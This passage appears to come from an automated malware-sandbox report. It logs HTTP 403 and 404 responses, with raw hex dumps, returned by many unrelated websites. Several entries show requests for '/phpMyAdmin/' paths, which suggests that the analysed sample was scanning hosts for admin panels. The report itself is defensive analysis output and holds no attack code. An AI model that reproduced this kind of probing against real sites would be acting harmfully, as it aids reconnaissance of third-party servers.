b6 7f db 67 f6 46 cc ed 6d 5f da 9d dd f6 03 42 e1 b6 2f 3b df f6 dd a1 ed d8 ce 6d 7f e2 6d 27 de 6d 5f 47 3a 6c b9 ee eb 76 96 2e 75 a4 b3 bb e5 e3 f0 d8 dd 52 a2 b1 bb e5 5b 05 c8 ee 24 20 c9 69 00 ba bf d3 03 92 06 98 4b 35 0a 7d 7d a1 6e f7 04 dd f6 37 99 15 a7 41 92 87 c0 6e fb 9f 99 6c 90 9d 2d 0a 09 60 06 f6 3a 4e ed cf ec c7 3b a0 f3 b1 3d b4 3d 7d bf 9f 5d f5 7f b8 d6 7e 5f c5 4c 13 7e af c5 4c c3 39 27 d6 12 52 a0 98 43 a8 fd d0 bf ba 8e f2 34 10 9e 65 c4 28 35 77 77 98 6a 04 31 04 b3 b2 5d 0b 0c 30 77 9c de cb 67 7c be 63 79 26 62 f1 77 60 9c f9 80 78 bc 06 c6 f1 3a f3 8d 14 36 da 4f 98 83 69 df e1 24 87 77 91 61 ee 67 0c 18 8b 49 fa 9e 13 8a 97 60 33 e0 ff e2 b0 36 08 fa ef f7 ef fe c7 66 9c c6 e9 32 8e ee 0d 6e 9a fb 00 f3 60 25 e8 f6 fb 8a 3e 33 00 71 a1 1a d8 41 02 98 fe 06 01 37 1c e4 20 b0 03 9c de 61 66 ab e8 af 3e ae 20 5e ae b8 89 c0 8e e2 24 f9 1d b6 dc e0 c8 41 8e 39 13 83 e3 73 a1 e5 87 38 e5 03 ef 1f 94 e2 7b 03 ec 25 f0 7f 89 b0 fc 09 73 7c 09 b4 1d 62 8e 4d 44 e7 c6 13 74 4a a5 4e e8 5b 69 63 ce 28 f0 9c a6 1a b7 e1 0e e8 bd 51 1a 50 98 cf dc 15 0f 61 3e 9f d3 8f fc 8f bd 59 1b 38 2f 0d cc 36 b1 30 3f 37 77 01 66 a0 47 09 5e ea 7e d1 31 35 00 e9 b7 79 38 1d 04 b7 79 18 45 83 db 3c 02 27 ba cd 3d c7 09 6f 73 6f 8c 27 aa 45 3f 29 b6 38 10 33 7f bc 76 fd eb 43 d8 30 c2 15 45 18 0d 9a 50 f2 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=uUjDfDKiscPGRHiPv0AMys7o7DrYqdSrpiTBVYxEBnQ-1703276092-1-AQ7IGWavixPjnJmxbAZd1hbKiyNBRprpGWedNT7TzvdwXN6NNXtjd/NjmV2tiEfcKEC3yL235bhGCYibV00Siiw=; path=/; expires=Fri, 22-Dec-23 20:44:52 GMT; domain=.jaydien.com; HttpOnly; SameSite=NoneServer: cloudflareCF-RAY: 839b089a3abd0a0e-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 00 00 ff ff 03 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 73(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: IPB17Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 35 32 30 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 66
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-165.ec2.internalX-Request-Id: 16ed42c4-79d4-4ef2-a30d-e643fd8561f5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-234.ec2.internalX-Request-Id: 79295735-4621-4c39-bf82-94d7ab2a0170Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 209Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpMyAdmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-53.ec2.internalX-Request-Id: be8ca3a9-79f0-458a-a11d-c877f05164a0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6b 61 6e 64 69 6e 73 6b 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 32 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276092.96717106201151909Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaliLS65Gchd7liiJBMWem/INlXLezy9ToUd017cVYlCANhcwCyQrKJIG5Qj+FSBkgbQ==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,HGBagNbHaHjyb4d/UK6fckbYqB6/hwX5/SRH1bPtEcQ=,DEnfYUXdSlAXRA94e/x0z9PemxzKRf9YsHX50AJRTUM=,WDMzHiyOL7uW518fW2ByrzK4uecrAoLjthJtqM/WcVpTU9y8YawPmYqGpapuMtBNBCnxTH98zwTLyGB2+G5M+w==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 ed bc ca 00 f3 8f 65 44 Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#eD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
